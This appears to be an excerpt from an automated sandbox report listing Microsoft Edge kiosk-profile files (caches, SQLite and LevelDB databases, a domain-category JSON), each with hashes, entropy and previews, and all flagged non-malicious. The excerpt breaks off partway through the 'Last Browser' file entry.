C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\f49d247f-b485-4514-98ef-19b9d802c4c1.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	24799
Entropy (8bit):	5.5657063143726075
Encrypted:	false
SSDEEP:	768:/2oys/WP7zfRc8F1+UoAYDCx9Tuqh0VfUC9xbog/OV2jzbprww1pGtuq:/2oys/WP7zfRcu1javnba7tZ
MD5:	378CEB3B8E31FEB38B902574140F87E7
SHA1:	E9CB39B159B7B8E446AF34D786C4B2BCB1413D98
SHA-256:	1FBB2404BC08BE91B3443370D2064CBEC24472F98C4026B6007C7E99C80DF899
SHA-512:	49B54AFAFDA850D2BAA4E066D870036A146CDD201158BCEDA8F76E127A2B440306AA2884B4A08C5BB14F92C8859ACF1640CAC4C2E2EF15230E9667F5C3364926
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13369638492823597","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13369638492823597","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\heavy_ad_intervention_opt_out.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 4, cookie 0x2, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.35226517389931394
Encrypted:	false
SSDEEP:	12:TLC+waBg9LBgVDBgQjiZBgKuFtuQkMbmgcVAzO5kMCgGUg5OR:TLPdBgtBgJBgQjiZS53uQFE27MCgGZsR
MD5:	D2CCDC36225684AAE8FA563AFEDB14E7
SHA1:	3759649035F23004A4C30A14C5F0B54191BEBF80
SHA-256:	080AEE864047C67CB1586A5BA5EDA007AFD18ECC2B702638287E386F159D7AEE
SHA-512:	1A915AF643D688CA68AEDC1FF26C407D960D18DFDE838B417C437D7ADAC7B91C906E782DCC414784E64287915BD1DE5BB6A282E59AA9FEB8C384B4D4BC5F70EC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.......Q......Q......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\load_statistics.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, writer version 2, read version 2, file counter 1, database pages 1, cookie 0, schema 0, unknown 0 encoding, version-valid-for 1
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.0905602561507182
Encrypted:	false
SSDEEP:	3:lSWFN3sl+ltlMWll:l9Fys1M
MD5:	A8E75ACC11904CB877E15A0D0DE03941
SHA1:	FBEE05EA246A7F08F7390237EA8B7E49204EF0E0
SHA-256:	D78C40FEBE1BA7EC83660B78E3F6AB7BC45AB822B8F21B03B16B9CB4F3B3A259
SHA-512:	A7B52B0575D451466A47AFFE3DCC0BC7FC9A6F8AB8194DA1F046AADA0EDDCCA76B4326AA9F19732BA50359B51EC72896BB8FA2FC23BAA6847C33AB51218511A4
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\load_statistics.db-journal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.28499812076190567
Encrypted:	false
SSDEEP:	3:7FEG2l/E5PlFll:7+/l/U
MD5:	25C899B0C05F8E5F55D2D704146B2D9A
SHA1:	D51B7F0164CE23600E7FCD2B93E9B084F4FBC603
SHA-256:	048CA6714B4D417E1DB4AC2BC46DA0A360BA7FB8BA294AA687F74373E2FC8790
SHA-512:	15E49AB3C1E70F8C96E639B9A3B56F4DC986D799EE7A741B199E81817B4D8AFA0290E771C443D4ADBD46F639A1AEB6017FFF180FF0B8356ABC2FEEDA076A377C
Malicious:	false
Preview:	.... .c.....a.NF................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\load_statistics.db-shm

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.04978389697146339
Encrypted:	false
SSDEEP:	6:GLW0tQeW0tIXCL9X8hslotGLNl0ml/XoQDeX:aD+6GEjVl/XoQ
MD5:	2553FE62340F7F2D73205114CC44915E
SHA1:	4075E832B0305C997C49EDDC33C3D542A5154E77
SHA-256:	A012A3EBA3E12AA440B0ED0A7B34323AD86AA716C2C2313600A47BD1299CF368
SHA-512:	BC180EBAAE2BCCD78A89B83EF63FA5EFF795AF45A8FAA01DD647A38E5934D1F7206FCCAADECB72DF08475E1EB8080F772A15E84F98E877A52B65E56F264AC5FF
Malicious:	false
Preview:	..-..................... ..@....Tqt...D....t.._..-..................... ..@....Tqt...D....t.._........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\load_statistics.db-wal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite Write-Ahead Log, version 3007000
Category:	dropped
Size (bytes):	70072
Entropy (8bit):	0.9955710026250622
Encrypted:	false
SSDEEP:	48:RSqzx10lO+YLUcbX+6n9VAKAFXX++j2VAKAFXX+nuxOqVAKAFXX+SnUYVAKAFXXf:w6xCYLOrNsSNsn8O5Ns9NsvQ
MD5:	E1136A47864D45EC7E4CC575AF4DAFC4
SHA1:	6657ED5B93FD12452B35E35765633FD33E09CCEF
SHA-256:	456C94BDBB087BDA08DED48DFA5CD92FD2481CFBFE703A641B194A26C9CDFEAE
SHA-512:	7667463943CBA6274C7FA9148B5B190682C83BCEC50AF2D3CE1A48DB772EF4671AE9886915D6A9988F0D257AD37C6EE650A839AB5B69D50C0A48CE5B594BE946
Malicious:	false
Preview:	7....-...........Tqt...DIXW.F,...........Tqt...D0...2.Y.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\shared_proto_db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\shared_proto_db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1566
Entropy (8bit):	5.505872691252664
Encrypted:	false
SSDEEP:	48:gsM83SBSGQnPFEHRH8xiIYjIYQzQqkRMYjMYpyPAlkfAlkl3:O0GQtsIYjIYQzQbRMYjMY0YcYw3
MD5:	1042926366926A774E79D02F600D52F5
SHA1:	63E1190C16A1CA10D456586346A74AEA4CB33F15
SHA-256:	0ECFC88AACBFDBE45B1DE4CC9C105D1E9C98910A61E015E06973945402DABA9C
SHA-512:	16DB09A782FF44ED8975D1D70AA1B94B8D563399C07165E3CE3D10172880956F21BEA3470B5FAAD8C6C539C7B0DBB4042D645362D9FD8A9DA3004E634DB401ED
Malicious:	false
Preview:	A..r.................20_1_1...1.,U.................20_1_1...1..&f.................V)0................39_config..........6.....n ....1u}.=.................'..................4_IPH_CompanionSidePanel...IPH_CompanionSidePanel.....$4_IPH_CompanionSidePanelRegionSearch(."IPH_CompanionSidePanelRegionSearch......4_IPH_DownloadToolbarButton...IPH_DownloadToolbarButton.....&4_IPH_FocusHelpBubbleScreenReaderPromo.$IPH_FocusHelpBubbleScreenReaderPromo......4_IPH_GMCCastStartStop...IPH_GMCCastStartStop......4_IPH_HighEfficiencyMode...IPH_HighEfficiencyMode......4_IPH_LiveCaption...IPH_LiveCaption......4_IPH_PasswordsAccountStorage!..IPH_PasswordsAccountStorage....."4_IPH_PasswordsWebAppProfileSwitch&. IPH_PasswordsWebAppProfileSwitch.....-4_IPH_PriceInsightsPageActionIconLabelFeature1.+IPH_PriceInsightsPageActionIconLabelFeature......4_IPH_PriceTrackingChipFeature"..IPH_PriceTrackingChipFeature.....&4_IPH_PriceTrackingEmailConsentFeature.$IPH_PriceTrackingEmailConsentFeature.....-4_IPH_PriceT

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\shared_proto_db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\shared_proto_db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.233415862930531
Encrypted:	false
SSDEEP:	6:PItEG81923oH+Tcwt0rl2KLllItFSVq2P923oH+Tcwt0rK+IFUv:PIhxYebeLnIWv4Yeb13FUv
MD5:	1441A9F94D6F4C8EAECD9F776826D6AE
SHA1:	DEE819E404AEA0A6AC5D319CDB26F845EA63B43F
SHA-256:	D53277A9855DE4EB2C4AB9F9A600FAF6F71E54C858821E4DB56331D0448A62D2
SHA-512:	B420DC9291CB3DE20272A1F1F31134B15D0ECECEFE942E3159DFC20AFFA44D8B916BA424EB6AE55C4A1FED45889E9678D53031F3889A754209E7B2B09BB54834
Malicious:	false
Preview:	2024/09/01-00:28:13.368 1d50 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\shared_proto_db since it was missing..2024/09/01-00:28:13.543 1d50 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\shared_proto_db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\shared_proto_db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\shared_proto_db\metadata\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\shared_proto_db\metadata\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	729
Entropy (8bit):	3.959082612190602
Encrypted:	false
SSDEEP:	12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvLAedN4W:G0nYUtypD3RUovhC+lvBOLp
MD5:	451C78A410E36D9505AF8797B08226EC
SHA1:	EE0B72590AE3A77637DA92E36004F9C4F668198C
SHA-256:	803DF30D5DF0329E4B9098AE45510AB5DD52903198287F390858AD84678148AD
SHA-512:	7303C125924751F40C943FFFA69A7BEAE6A26A6913C362DB2AA1ADB09DBAFD58DD902E98801796F2D55B3C65DE77A1CA767D95C19B2F13B28F79DA8911F89D2A
Malicious:	false
Preview:	.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J\|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.\|.................9_.....'\c..................9_......r...................3_.......I..................4_.......F.................3_.......P..................4_.....

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\shared_proto_db\metadata\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\shared_proto_db\metadata\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	313
Entropy (8bit):	5.19724322908493
Encrypted:	false
SSDEEP:	6:PItXz81923oH+Tcwt0rzs52KLllItK/YVq2P923oH+Tcwt0rzAdIFUv:PIZzxYeb99LnIY/Av4YebyFUv
MD5:	363CB7CA1F990069678156908504A917
SHA1:	B29F89A166DFF1EC76810B5590634D960E21F1BD
SHA-256:	E79D7B10D4D2F08B422D943A9A7F231316B30B02F4258100C9E1D8ABEDEA6541
SHA-512:	BEF34264A8D02F01882D44D33FBF0C9AC963D51CC125A0258D224BBA0778D2412E2469591FA7D43D49081A94AF177BA148DA1F18AD8317D8B7F2CCEE83525864
Malicious:	false
Preview:	2024/09/01-00:28:13.355 1d50 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\shared_proto_db\metadata since it was missing..2024/09/01-00:28:13.366 1d50 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\shared_proto_db\metadata/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\shared_proto_db\metadata\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\uu_host_config

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	403024
Entropy (8bit):	4.987691454989427
Encrypted:	false
SSDEEP:	1536:HYbzOWIwetxI2LpvNCIFu77T38WJ5BR8Mm6EW9uU8ywMsF9leE08d207nMGvykSB:EPenNgBRrmVlr0K2lP/lFlWfEwlCx
MD5:	8F9BDA485854A823E20B47C4897937CF
SHA1:	A86D1E2D3AE6E2F2CAF52DAF6D839EB02FE4B334
SHA-256:	67487ABF17DE6084CF6D117F0551E92D3BA8DC70B08D17D3685603451799EF28
SHA-512:	5C94F19AE23F4220C455DBAD0DB1640A47D981D45306939496744CC1DF2BD5980F25E417C764661CBD608D69E178CB4795763E04F21F5812AC0BA7BBCAA1008C
Malicious:	false
Preview:	{.. "0123movies.com": "{\"Tier1\": [983, 6061], \"Tier2\": [4948, 1106, 9972]}",.. "1020398.app.netsuite.com": "{\"Tier1\": [6061, 8405, 5938], \"Tier2\": [228, 236]}",.. "1337x.to": "{\"Tier1\": [6061, 983], \"Tier2\": [6657, 475, 4068]}",.. "2cvresearch.decipherinc.com": "{\"Tier1\": [8405], \"Tier2\": [379, 6101]}",.. "3817341.extforms.netsuite.com": "{\"Tier1\": [6061, 8405, 5938], \"Tier2\": [7746]}",.. "3cx.integrafin.co.uk": "{\"Tier1\": [8405, 6061], \"Tier2\": [2863, 5391]}",.. "4540582.extforms.netsuite.com": "{\"Tier1\": [8405], \"Tier2\": [228, 236, 7746]}",.. "7589.directpaper.name": "{\"Tier1\": [8405], \"Tier2\": []}",.. "7a201srvitportl.cymru.nhs.uk": "{\"Tier1\": [], \"Tier2\": [9870]}",.. "7a3cjsvmifitla1.cymru.nhs.uk": "{\"Tier1\": [6061], \"Tier2\": [1092]}",.. "7a3cjsvmlivwebb.cymru.nhs.uk": "{\"Tier1\": [148, 6061], \"Tier2\": [9870, 9813]}",.. "8ballpool.com": "{\"Tier1\": [8741, 3907, 983], \"Tier2\": [9151, 5779, 6916]}",..

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\GrShaderCache\data_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.01057775872642915
Encrypted:	false
SSDEEP:	3:MsFl:/F
MD5:	CF89D16BB9107C631DAABF0C0EE58EFB
SHA1:	3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
SHA-256:	D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
SHA-512:	8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
Malicious:	false
Preview:	............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\GrShaderCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	8.280239615765425E-4
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2:/M/xT02
MD5:	D0D388F3865D0523E451D6BA0BE34CC4
SHA1:	8571C6A52AACC2747C048E3419E5657B74612995
SHA-256:	902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
SHA-512:	376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\GrShaderCache\data_2

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.011852361981932763
Encrypted:	false
SSDEEP:	3:MsHlDll:/H
MD5:	0962291D6D367570BEE5454721C17E11
SHA1:	59D10A893EF321A706A9255176761366115BEDCB
SHA-256:	EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
SHA-512:	F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\GrShaderCache\data_3

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.012340643231932763
Encrypted:	false
SSDEEP:	3:MsGl3ll:/y
MD5:	41876349CB12D6DB992F1309F22DF3F0
SHA1:	5CF26B3420FC0302CD0A71E8D029739B8765BE27
SHA-256:	E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
SHA-512:	E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\GrShaderCache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
Category:	dropped
Size (bytes):	262512
Entropy (8bit):	9.47693366977411E-4
Encrypted:	false
SSDEEP:	3:LsNll:Ls3
MD5:	8A6B8F1BF1B4151BAB08C3FA3D2C0A84
SHA1:	06985682D07631C6F2D7C827D58B6F293A8B3087
SHA-256:	EA4204DEA4DA7F772DFC23201D13A96FF4D8660AD69BEDE62DFA500B816305D7
SHA-512:	70A28819B46DF0F7F6E92CDCB81A4A5EAFA14124363425057B2D7AFC6FC0B2E2D697F68B2C4238C4A76E8D0B90D68CB84EDF863EAF5321EC308DF7DA58283BDE
Malicious:	false
Preview:	........................................../.../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\GraphiteDawnCache\data_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.01057775872642915
Encrypted:	false
SSDEEP:	3:MsFl:/F
MD5:	CF89D16BB9107C631DAABF0C0EE58EFB
SHA1:	3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
SHA-256:	D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
SHA-512:	8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
Malicious:	false
Preview:	............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\GraphiteDawnCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	8.280239615765425E-4
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2:/M/xT02
MD5:	D0D388F3865D0523E451D6BA0BE34CC4
SHA1:	8571C6A52AACC2747C048E3419E5657B74612995
SHA-256:	902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
SHA-512:	376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\GraphiteDawnCache\data_2

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.011852361981932763
Encrypted:	false
SSDEEP:	3:MsHlDll:/H
MD5:	0962291D6D367570BEE5454721C17E11
SHA1:	59D10A893EF321A706A9255176761366115BEDCB
SHA-256:	EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
SHA-512:	F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\GraphiteDawnCache\data_3

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.012340643231932763
Encrypted:	false
SSDEEP:	3:MsGl3ll:/y
MD5:	41876349CB12D6DB992F1309F22DF3F0
SHA1:	5CF26B3420FC0302CD0A71E8D029739B8765BE27
SHA-256:	E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
SHA-512:	E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\GraphiteDawnCache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
Category:	dropped
Size (bytes):	262512
Entropy (8bit):	9.553120663130604E-4
Encrypted:	false
SSDEEP:	3:LsNlJB/:Ls3J
MD5:	451314C0F1D7918CF90D893071636563
SHA1:	23B1C6D80D1EE50BFACBBEEA2F6C7BF17F20A6DB
SHA-256:	AD0662DD08CFB096135C0EAB9137A9DDF0011EB5329FDDC97E90DC48AD9A54A3
SHA-512:	C73C4129EB8CCE46E78FAA7B34FA514ACDF9C42F32A963FAE0F9E8397038750F9EBB26360E5182B251EC22E82450B452672170D2CAA2BEF16FB752D24BF769B2
Malicious:	false
Preview:	........................................].2.../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Last Browser

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	120
Entropy (8bit):	3.32524464792714
Encrypted:	false
SSDEEP:	3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
MD5:	A397E5983D4A1619E36143B4D804B870
SHA1:	AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
